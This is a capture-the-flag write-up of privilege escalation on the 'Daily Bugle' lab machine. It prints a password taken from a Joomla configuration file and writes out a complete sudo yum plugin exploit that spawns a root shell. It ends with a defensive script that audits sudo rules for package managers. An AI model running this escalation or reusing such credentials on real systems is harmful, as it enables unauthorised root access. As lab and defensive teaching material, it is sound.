
Daily Bugle

Privilege Escalation

  • We catch the reverse shell using netcat.
apache@dailybugle /$  id
uid=48(apache) gid=48(apache) groups=48(apache)

  • Enumerating files on the system, we found the password for one of its users: jjameson
  • File location: /var/www/html/configuration.php
  • Password: nv5uz9r3ZEDzVjNu
class JConfig {
public $user = 'jjameson';
public $password = 'nv5uz9r3ZEDzVjNu';
}

  • Using the found credentials to switch user: jjameson:nv5uz9r3ZEDzVjNu
  • The user jjameson can run /usr/bin/yum as root without a password.
[jjameson@dailybugle ~]$ id
uid=1000(jjameson) gid=1000(jjameson) groups=1000(jjameson)
[jjameson@dailybugle ~]$ sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum

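  • Using /usr/bin/yum to escalate privileges: a custom configuration file points yum's plugin paths at a temporary directory, so the plugin's init_hook runs as root.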
[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>     os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
[root@dailybugle ~]$ id
uid=0(root) gid=0(root) groups=0(root)
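
The sudo rule above is the root cause of this escalation, so here is a defender-side check for it, added as an example and not part of the original write-up: it reads `sudo -l` output and flags rules that grant a package manager (or ALL) to a user. The RISKY list, the function names, and the second rule in the sample are assumptions constructed for this example.

```shell
#!/bin/sh
# Audit `sudo -l` output for rules that hand root to a package manager.
# Package managers load plugins and run package scripts with the caller's
# effective uid, so an unrestricted sudo rule for one is equivalent to root.
# RISKY is a constructed, non-exhaustive list for this example.
RISKY="yum dnf rpm apt apt-get dpkg pip"

# Sample input: the rule from this page plus one constructed benign rule.
sample_sudo_l() {
  cat <<'EOF'
User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/systemctl restart httpd
EOF
}

# audit_sudo_rules: reads `sudo -l` text on stdin and prints one finding per
# line as "<severity> <runas> <command>". Returns 1 if anything was flagged.
# Usage on a live host: sudo -l | audit_sudo_rules
audit_sudo_rules() {
  awk -v risky="$RISKY" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
    # Rule lines start with the run-as spec, e.g. "(ALL) NOPASSWD: /usr/bin/yum"
    /^[ \t]*\(/ {
      line = $0
      sub(/^[ \t]*/, "", line)
      runas = line; sub(/\).*/, ")", runas)
      rest = substr(line, length(runas) + 1)
      nopass = (rest ~ /NOPASSWD:/)
      gsub(/[A-Z_]+:[ \t]*/, "", rest)        # drop tags such as NOPASSWD:
      sub(/^[ \t]*/, "", rest)
      m = split(rest, cmds, /,[ \t]*/)        # one rule may list several commands
      for (j = 1; j <= m; j++) {
        split(cmds[j], w, " ")
        base = w[1]; sub(/.*\//, "", base)    # basename of the command path
        if (w[1] == "ALL" || (base in bad)) {
          sev = nopass ? "HIGH" : "MEDIUM"    # no password prompt is worse
          print sev, runas, cmds[j]
          found = 1
        }
      }
    }
    END { exit (found ? 1 : 0) }
  '
}
```

For the sample input the function reports `HIGH (ALL) /usr/bin/yum` and leaves the systemctl rule alone.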